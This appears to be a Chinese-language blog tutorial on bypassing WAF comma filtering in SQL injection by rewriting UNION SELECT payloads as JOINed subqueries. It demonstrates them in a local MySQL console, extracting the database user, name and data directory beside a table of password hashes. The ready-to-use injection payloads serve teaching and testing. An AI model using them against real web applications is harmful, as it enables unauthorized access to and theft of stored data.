[SQL注入] 逗号拦截绕过

在SQL注入时，在确定了注入点后，一般都需要使用联合查询猜表的列数，也就是常见的order by n，n从大到小，直到返回正常，就确定了当前查询的列的个数。

然后再使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位，然后再 UNION SELECT 1,2,3,4,database(),6,7..n ，这是一个常规流程，语句中包含了多个逗号。

但是如果有WAF拦截了逗号时，我们的联合查询就被拦截了。

如果想绕过，就需要使用 Join 方法绕过。join的介绍看我的另一篇文章。

 

其实就简单的几句，在显示位上替换为常见的注入变量或其它语句：

union select 1,2,3,4;
union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);

 

常用数据库变量：

User() 查看用户 
database() --查看数据库名称 
Version() --查看数据库版本 
@@datadir --数据库路径
@@version_compile_os--操作系统版本 
system_user() --系统用户名 
current_user()--当前用户名 
session_user()--连接数据库的用户名

 

 

 

 

举例：

1. 假设我有一个表user，有5个列（字段），2行记录：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

mysql> show tables; +--------------------------+ | Tables_in_gogs           | +--------------------------+ | user                     | | version                  | +--------------------------+ 2 rows in set (0.00 sec)   mysql> desc user; +----------------------+---------------+------+-----+---------+----------------+ | Field                | Type          | Null | Key | Default | Extra          | +----------------------+---------------+------+-----+---------+----------------+ | id                   | bigint(20)    | NO   | PRI | NULL    | auto_increment | | name                 | varchar(255)  | NO   | UNI | NULL    |                | | email                | varchar(255)  | NO   |     | NULL    |                | | passwd               | varchar(255)  | NO   |     | NULL    |                | | salt                 | varchar(10)   | NO   |     | NULL    |                | +----------------------+---------------+------+-----+---------+----------------+ 5 rows in set (0.01 sec)   mysql> select id,name,email,passwd from user; +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ | id | name      | email            | passwd                                                                                               | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ |  1 | zhangsan  | 11111@qq.com     | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e | |  2 | ihoney    | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ 2 rows in set (0.00 sec)

　　

2. UNION开头的是我们在URL中注入的语句，这里只是演示，在实际中如果我们在注入语句中有逗号就可能被拦截。

1 2 3 4 5 6 7 8 9

mysql> select id,name,email,passwd from user union select 1,2,3,4; +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ | id | name      | email            | passwd                                                                                               | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ |  1 | zhangsan  | 11111@qq.com     | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e | |  2 | ihoney    | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af | |  1 | 2         | 3                | 4                                                                                                    | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ 3 rows in set (0.00 sec)

　　

3. 不出现逗号，使用Join来继续注入

1 2 3 4 5 6 7 8 9

mysql> select id,name,email,passwd from user union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D); +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ | id | name      | email            | passwd                                                                                               | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ |  1 | zhangsan  | 11111@qq.com     | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e | |  2 | ihoney    | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af | |  1 | 2         | 3                | 4                                                                                                    | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ 3 rows in set (0.00 sec)

　　

4. 绕过之后就可以替换显示的数字位继续注入获取数据库及系统信息 

1 2 3 4 5 6 7 8 9

mysql> select id,name,email,passwd from user union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D); +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ | id | name      | email            | passwd                                                                                               | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ |  1 | zhangsan  | 11111@qq.com     | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e | |  2 | ihoney    | 102505481@qq.com | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af | |  1 | 2         | 3                | root@localhost gogs /var/lib/mysql/                                                                  | +----+-----------+------------------+------------------------------------------------------------------------------------------------------+ 3 rows in set (0.00 sec)